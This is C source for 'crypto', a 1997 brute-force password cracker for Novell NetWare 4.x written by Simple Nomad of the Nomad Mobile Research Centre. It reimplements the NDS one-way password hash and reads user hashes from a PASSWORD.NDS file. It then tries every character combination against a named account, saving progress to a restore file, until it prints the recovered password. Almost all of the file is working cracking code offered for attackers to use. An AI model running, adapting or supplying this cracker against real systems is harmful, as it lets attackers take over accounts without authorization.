/*************************************************************************
* *
* crypto.c - cracks one way encrypted passwords from NDS *
* *
* Programmer - Simple Nomad - Nomad Mobile Research Centre *
* Crypto routines by itsme@xs4all.nl *
* *
*-----------------------------------------------------------------------*
* *
* 6/6/97 - Initial Revision *
* *
*-----------------------------------------------------------------------*
* *
* 6/13/97 - Completed basic program. *
* *
*-----------------------------------------------------------------------*
* *
* 6/26/97 - Redid brute force attack. Cleaned up code. *
* *
*-----------------------------------------------------------------------*
* *
* 6/27/97 - Minor bug fixes to improve memory usage. *
* *
*-----------------------------------------------------------------------*
* *
* 6/28/97 - Removed several old routines, minor bug fixes. *
* *
*-----------------------------------------------------------------------*
* *
* 6/29/97 - Fixed problem that crashed DOS windows under Win95, also *
* added big endian support. *
* *
*************************************************************************/
/*
* Includes
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
* Typedefs for program
*/
typedef unsigned char uint8;
typedef unsigned int uint16;
typedef unsigned long uint32;
/*
* The PASSWORD.NDS struct and a global pointer
*/
typedef struct password
{
uint32 selfOffset; /* Offset in PASSWORD.NDS. If this is
the first record, it is 0x00000000
followed by 0x0000014e for the
second record, etc. */
uint32 id; /* Object ID from ENTRY */
uint32 parentID; /* Parent ID */
uint32 objectID; /* Object ID from Private Key */
uint32 pwlen; /* Password length of user account */
uint8 hash[16]; /* One-way hash */
uint8 userOU[40]; /* OU of User */
uint8 userCN[258]; /* User common name */
} PASSWORD; /* size=334 */
PASSWORD pPassword;
#ifdef ENDIAN
union
{
uint32 longData;
uint8 shortData[4];
} output;
union
{
uint32 longData;
uint8 shortData[4];
} input;
#endif
/*
* Global constants
*/
#define TRUE 1
#define FALSE 0
uint8 nyblTab[256]= /* used by encrypt */
{/* 0 1 2 3 4 5 6 7 8 9 a b c d e f */
0x7,0x8,0x0,0x8,0x6,0x4,0xE,0x4,0x5,0xC,0x1,0x7,0xB,0xF,0xA,0x8,
0xF,0x8,0xC,0xC,0x9,0x4,0x1,0xE,0x4,0x6,0x2,0x4,0x0,0xA,0xB,0x9,
0x2,0xF,0xB,0x1,0xD,0x2,0x1,0x9,0x5,0xE,0x7,0x0,0x0,0x2,0x6,0x6,
0x0,0x7,0x3,0x8,0x2,0x9,0x3,0xF,0x7,0xF,0xC,0xF,0x6,0x4,0xA,0x0,
0x2,0x3,0xA,0xB,0xD,0x8,0x3,0xA,0x1,0x7,0xC,0xF,0x1,0x8,0x9,0xD,
0x9,0x1,0x9,0x4,0xE,0x4,0xC,0x5,0x5,0xC,0x8,0xB,0x2,0x3,0x9,0xE,
0x7,0x7,0x6,0x9,0xE,0xF,0xC,0x8,0xD,0x1,0xA,0x6,0xE,0xD,0x0,0x7,
0x7,0xA,0x0,0x1,0xF,0x5,0x4,0xB,0x7,0xB,0xE,0xC,0x9,0x5,0xD,0x1,
0xB,0xD,0x1,0x3,0x5,0xD,0xE,0x6,0x3,0x0,0xB,0xB,0xF,0x3,0x6,0x4,
0x9,0xD,0xA,0x3,0x1,0x4,0x9,0x4,0x8,0x3,0xB,0xE,0x5,0x0,0x5,0x2,
0xC,0xB,0xD,0x5,0xD,0x5,0xD,0x2,0xD,0x9,0xA,0xC,0xA,0x0,0xB,0x3,
0x5,0x3,0x6,0x9,0x5,0x1,0xE,0xE,0x0,0xE,0x8,0x2,0xD,0x2,0x2,0x0,
0x4,0xF,0x8,0x5,0x9,0x6,0x8,0x6,0xB,0xA,0xB,0xF,0x0,0x7,0x2,0x8,
0xC,0x7,0x3,0xA,0x1,0x4,0x2,0x5,0xF,0x7,0xA,0xC,0xE,0x5,0x9,0x3,
0xE,0x7,0x1,0x2,0xE,0x1,0xF,0x4,0xA,0x6,0xC,0x6,0xF,0x4,0x3,0x0,
0xC,0x0,0x3,0x6,0xF,0x8,0x7,0xB,0x2,0xD,0xC,0x6,0xA,0xA,0x8,0xD
};
/*
/ nyblTab reversed
/
/ 0 02 1c 2b 2c 30 3f 6e 72 89 9d ad b8 bf cc ef f1
/ 1 0a 16 23 26 48 4c 51 69 73 7f 82 94 b5 d4 e2 e5
/ 2 1a 20 25 2d 34 40 5c 9f a7 bb bd be ce d6 e3 f8
/ 3 32 36 41 46 5d 83 88 8d 93 99 af b1 d2 df ee f2
/ 4 05 07 15 18 1b 3d 53 55 76 8f 95 97 c0 d5 e7 ed
/ 5 08 28 57 58 75 7d 84 9c 9e a3 a5 b0 b4 c3 d7 dd
/ 6 04 19 2e 2f 3c 62 6b 87 8e b2 c5 c7 e9 eb f3 fb
/ 7 00 0b 2a 31 38 49 60 61 6f 70 78 cd d1 d9 e1 f6
/ 8 01 03 0f 11 33 45 4d 5a 67 98 ba c2 c6 cf f5 fe
/ 9 14 1f 27 35 4e 50 52 5e 63 7c 90 96 a9 b3 c4 de
/ a 0e 1d 3e 42 47 6a 71 92 aa ac c9 d3 da e8 fc fd
/ b 0c 1e 22 43 5b 77 79 80 8a 8b 9a a1 ae c8 ca f7
/ c 09 12 13 3a 4a 56 59 66 7b a0 ab d0 db ea f0 fa
/ d 24 44 4f 68 6d 7e 81 85 91 a2 a4 a6 a8 bc f9 ff
/ e 06 17 29 54 5f 64 6c 7a 86 9b b6 b7 b9 dc e0 e4
/ f 0d 10 21 37 39 3b 4b 65 74 8c c1 cb d8 e6 ec f4
*/
uint8 crypTab[32]= /* used by encrypt & encryptp */
{
0x48,0x93,0x46,0x67,0x98,0x3D,0xE6,0x8D,0xB7,0x10,0x7A,0x26,0x5A,0xB9,0xB1,0x35,
0x6B,0x0F,0xD5,0x70,0xAE,0xFB,0xAD,0x11,0xF4,0x47,0xDC,0xA7,0xEC,0xCF,0x50,0xC0
};
/* The characters used for brute force cracking */
char
data[68]={"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,./<>?;':\"[]{}`~!@#$%^&*()_-+=|"};
/*
* Global variables
*/
int level=0;
int crypt2data[96];
int crypt2_c_val[64];
int revcrypt2data[96];
int revcrypt2_c_val[64];
/*
* START OF ITSME ROUTINES
*/
/*
* generic dump routine
*/
void dump(uint8 *p,int l)
{
int i;
for (i=0 ; i<l ; i++)
{
printf("%02x",p[i]);
if (i==15) putchar(' ');
}
putchar('\n');
}
/*
* solve case problem
*/
int solveEqn(uint8 a, uint8 b, uint8 c, int startX)
{
int x;
for (x=startX ; x<256 ; x++)
if (((c^(x-a)^(x+b))&0xff)==0)
return x;
return -1;
}
uint8 calcElement(int index);
/*
* calc_c called by calcElement to get the c value
* c[0]=elem[0]
* c[1]=elem[0]+elem[1]
* c[2]=elem[0]+elem[1]+elem[2]
*/
int calc_c(int index)
{
if (index<32)
return 0;
if (crypt2_c_val[index-32]==-1)
crypt2_c_val[index-32]=calc_c(index-1)+calcElement(index);
return crypt2_c_val[index-32];
}
/*
* calcElement called by crypt2
*/
uint8 calcElement(int index)
{
int c;
int k;
int i;
int value;
int result;
if (index<0)
return 0;
if (crypt2data[index]!=-1)
return crypt2data[index];
c=calc_c(index-1);
i=index&0x1f;
k=(c+i)&0x1f;
value=calcElement(index-32);
if (k<i)
result=(calcElement(index-i+k)-crypTab[i]) ^ (value+c);
else if (k==i)
result=(value-crypTab[i]) ^ (value+c);
else /* k>i */
result=(calcElement(index-32-i+k)-crypTab[i]) ^ (value+c);
crypt2data[index]=result;
return result;
}
/*
* crypt2 2nd encryption on cipher
*/
void crypt2(uint8 *cipher)
{
int i;
for (i=0 ; i<32 ; i++)
cipher[i]=calcElement(64+i);
}
/*
* Now take the plaintext and make it ciphertext
*/
void forwardcrypt(uint8 *plain, uint8 *cipher)
{
int c;
int k;
int i;
int j;
uint8 buf[3][32];
memcpy(buf[0], plain, 32);
c=0;
for (j=0 ; j<2 ; j++)
for (i=0 ; i<32 ; i++)
{
k = (i+c)&0x1f;
if (k<i)
buf[j+1][i]=(buf[j+1][k] - crypTab[i]) ^ (buf[j][i]+c);
else if (k==i)
buf[j+1][i]=(buf[j][i] - crypTab[i]) ^ (buf[j][i]+c);
else /* k>i */
buf[j+1][i]=(buf[j][k] - crypTab[i]) ^ (buf[j][i]+c);
c+=buf[j+1][i];
}
memcpy(cipher, buf[2], 32);
}
uint8 revcalcElement(int index);
void initCalc(uint8 *plain)
{
int i;
for (i=0 ; i<32 ; i++)
crypt2data[i]=plain[i];
memset(crypt2data+32, -1, 64*sizeof(int));
memset(crypt2_c_val, -1, 64*sizeof(int));
}
/*
* initRevCalc called from main encryptp routine
*/
void initRevCalc(uint8 *cipher, int initial_c)
{
int i;
for (i=0 ; i<32 ; i++)
revcrypt2data[i+64]=cipher[i];
memset(revcrypt2data, -1, 64*sizeof(int));
memset(revcrypt2_c_val, -1, 64*sizeof(int));
revcrypt2_c_val[63]=initial_c;
}
/*
* calculate c for revcrypt
*/
int rev_calc_c(int index)
{
level++;
if (index<32)
{
level--;
return 0;
}
if (revcrypt2_c_val[index-32]==-1)
revcrypt2_c_val[index-32]=rev_calc_c(index+1)-revcalcElement(index+1);
level--;
return revcrypt2_c_val[index-32];
}
/*
* calc the element from the crypt table
*/
uint8 revcalcElement(int index)
{
int c;
int k;
int i;
int value;
int result;
level++;
if (index<0)
{
level--;
return 0;
}
if (revcrypt2data[index]!=-1)
{
level--;
return revcrypt2data[index];
}
c=rev_calc_c(index);
i=index&0x1f;
k=(c+i)&0x1f;
value=revcalcElement(index+32);
if (k<i)
result = value ^ (revcalcElement(index+32-i+k) - crypTab[i]) ;
else if (k==i)
result = solveEqn(crypTab[i], c, value, 0);
else /* k>i */
result = value ^ (revcalcElement(index-i+k) - crypTab[i]);
revcrypt2data[index]=result;
level--;
return result;
}
/*
* revcrypt2
*/
void revcrypt2(uint8 *plain)
{
int i;
for (i=0 ; i<32 ; i++)
plain[i]=revcalcElement(64+i);
}
/*
* shrink to 16 byte hash
*/
void shrinkbuf(uint8 *src, uint8 *dst)
{
int i;
for (i=0 ; i<16 ; i++)
{
*dst = nyblTab[*src++];
*dst++ |= nyblTab[*src++]<<4;
}
}
/*
* XOR password with object ID
*/
void xorwithid(uint32 id, uint32 *buf)
{
int i;
for (i=0 ; i<8 ; i++)
*buf++ ^= id;
}
/*
* Prepare the password by lengthening...
*/
void preparepw(uint8 *pw, int pwLen, uint8 *dst)
{
uint8 *p;
int i;
p=pw;
for (i=0 ; i<32 ; i++)
{
if (pw+pwLen==p)
{
p=pw;
*dst++=crypTab[i];
}
else
*dst++=*p++;
}
}
/*
* uint32 id : UserID
* char src[len] : unencrypted password to try
* int len : length of unencrypted password
* char dst[16] : encrypted password (result)
*/
int encryptp(uint32 id, uint8 *src, int len, uint8 *dst)
{
uint8 buf[32]; /* password xored with ID and itself ... */
uint8 buf2[32]; /* password xored with ID and itself ... */
int FOUND,i;
FOUND=TRUE;
preparepw(src, len, buf);
xorwithid(id, (uint32*)buf);
forwardcrypt(buf, buf2);
initCalc(buf);
crypt2(buf2);
initRevCalc(buf2, 0x58);
revcrypt2(buf);
shrinkbuf(buf2, dst);
/* dst should now contain the one way hash,
so we compare it to our targeted user's */
for (i=0;i<16;i++)
{
if (dst[i]!=pPassword.hash[i]) FOUND=FALSE;
}
return(FOUND);
}
/*
* END OF ITSME ROUTINES
*/
/*
* This routine switches byte ordering to get around the big
* endian -- little endian problem. I did this because systems
* like AIX offer no solutions for a big endian reading a little
* endian created file. Send it a uint32 and it returns the
* converted uint32.
*/
#ifdef ENDIAN
uint32 make_conversion(uint32 k) {
int i;
uint32 j;
input.longData=k;
for (i=0; i<4; i++)
output.shortData[i]=input.shortData[3-i];
return(output.longData);
}
#endif
/*
* Dump unicode to screen. I dislike unicode a lot, but this routine
* skips the 0x00's and only prints the parts that matter.
*/
void printUnicodeName(char *name, int j)
{
int i;
for (i=0;i<j;i++)
{
if (name[i]!=0) putchar(name[i]);
}
}
/*
* This routine counts the number of PASSWORD.NDS records and returns the
* value.
*/
long int countPasswordRecords(void)
{
FILE *fPassword;
long int j;
uint32 k;
ldiv_t calc;
fPassword=fopen("PASSWORD.NDS","rb");
if (fPassword==NULL)
{
printf("Unable to open PASSWORD.NDS\n");
exit(1);
}
fseek(fPassword,334,SEEK_END);
k=ftell(fPassword);
calc=ldiv(k,334);
j=calc.quot;
fclose(fPassword);
return(j);
}
/*
* print usage if needed
*/
void printHelp(int j)
{
printf("USAGE: crypto <options>\n");
printf(" -h This HELP screen\n");
printf(" -r RESTORE a previous brute force attack.\n");
printf(" -u <username> Attack the USER specified (username is case sensitive).\n\n");
printf("EXAMPLES:\n");
printf(" crypto -r\n");
printf(" crypto -u Admin\n\n");
exit(j);
}
/*
* This routine looks for a particular user. It is passed the total number
* of users to look through and who to look for. If found, TRUE is returned.
* FALSE is returned if the user was not found.
*/
int findEntryInPasswordFile(long int j, char *account)
{
FILE *fPassword;
int FOUND,i,k;
FOUND=FALSE;
fPassword=fopen("PASSWORD.NDS","rb");
if (fPassword==NULL)
{
printf("Unable to open PASSWORD.NDS\n");
exit(1);
}
while(j!=0)
{
fread(&pPassword,334,1,fPassword);
FOUND=TRUE;
for (i=0;i<strlen(account);i++)
{
k=i*2+6;
if (account[i]!=pPassword.userCN[k]) FOUND=FALSE;
}
if (FOUND==TRUE)
break;
j--;
}
fclose(fPassword);
return(FOUND);
}
/*
* Main prog
*/
void main(int argc, char **argv)
{
FILE *restoreTemp;
int i,t,FOUND,restore,counter;
long int j;
uint8 dstpw[16];
char *account;
char *last_try;
char try[16];
int try_index[]={0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
/* you would not BELIEVE how many problems this calloc solved */
account = calloc(sizeof(account), 1);
restore=FALSE;
last_try="||||||||||||||||";
counter=0;
/* say hello... */
printf("CRYPTO - Netware 4.x brute force password cracker\n");
printf("Written by Simple Nomad - Nomad Mobile Research Centre\n");
printf("Bugs to pandora@nmrc.org - http://www.nmrc.org\n");
printf(" Based off of Netware 3.x crypto routines written by itsme\n\n");
if (argc<2) printHelp(1);
/* process the command line */
for (i=1 ; i<argc ; i++)
{
if (argv[i][0]=='-')
switch(argv[i][1])
{
case 'r':
case 'R':
restore=TRUE;
break;
case 'u':
case 'U':
if ((i+1>argc) || argv[i+1][0]=='-')
{
printf("No argument given for option -u\n");
exit(1);
}
sprintf(account,"%s",argv[i+1]);
break;
case 'h':
case 'H':
case '?':
printHelp(0);
default:
printf("Invalid option: %s\n", argv[i]);
printHelp(1);
}
}
/* if we aren't restoring a past brute force attack,
we must find the user's info and set things up */
if(restore==FALSE)
{
j=countPasswordRecords();
FOUND=findEntryInPasswordFile(j,account);
if (FOUND==FALSE)
{
printf("%s not found in password file.\n",account);
exit(1);
}
FOUND=FALSE;
for (i=0;i<pPassword.pwlen;i++)
{
strcat(try,"A");
try_index[i]=0;
}
printf("Starting brute force...\n");
}
/* if restoring a past brute force attempt, read in where we
left off, reset the try_index array, and start processing */
else
{
restoreTemp=fopen("RESTORE.PAN","rb");
if (restoreTemp==NULL)
{
printf("Unable to open RESTORE.PAN\n");
exit(1);
}
fread(&pPassword,334,1,restoreTemp);
fgets(try,pPassword.pwlen+1,restoreTemp);
fflush(restoreTemp);
fclose(restoreTemp);
#ifdef ENDIAN
pPassword.objectID=make_conversion(pPassword.objectID);
#endif
for (i=0;i<pPassword.pwlen;i++)
{
for (t=0;t<68;t++)
if (try[i]==data[t]) try_index[i]=t;
}
printUnicodeName(pPassword.userCN,258);
printf("'s password brute force session restored.\n");
printf("Last attempt - %s\nContinuing brute force...\n",try);
}
/* tell the hacker why the screen looks hung... */
printf("Press CTRL-C or CTRL-BREAK to stop...\n");
/* loop forever (or until success, the bitter end, or power failure) */
while(1)
{
#ifndef UNIX
if (kbhit()); /* this must be here for MS-DOS to get in a ctrl-c */
#endif
counter++;
if (counter==1000) /* every 1000 attempts save our place */
{
counter=0;
restoreTemp=fopen("RESTORE.PAN","w+b");
if (restoreTemp==NULL)
{
printf("Unable to open RESTORE.PAN\n");
exit(1);
}
fwrite(&pPassword,334,1,restoreTemp);
fputs(try,restoreTemp);
fflush(restoreTemp);
fclose(restoreTemp);
}
/* do the test... */
FOUND = encryptp(pPassword.objectID, try, pPassword.pwlen, dstpw);
if (FOUND==TRUE) /* if we got it, break the loop */
break;
/* if it's the last attempt, break the loop */
if (strncmp(try,last_try,pPassword.pwlen)==0)
break;
i=0;
/* increment our index so we know what the next attempt is */
while(i<pPassword.pwlen)
{
if (try_index[i] < 66)
{
try_index[i]++;
break;
}
if (try_index[i]==66) try_index[i]=0;
i++;
};
/* after incrementing the index, update the char string */
for (i=0;i<pPassword.pwlen;i++)
{
t=try_index[i];
try[i]=data[t];
}
}
/* now we are out of the loop */
printf("\n");
printUnicodeName(pPassword.userCN,258);
if (FOUND==TRUE) /* if we got the password, print it */
printf(" password is %s\n",try);
else /* otherwise give the bad news */
printf("'s password not found.\n");
}
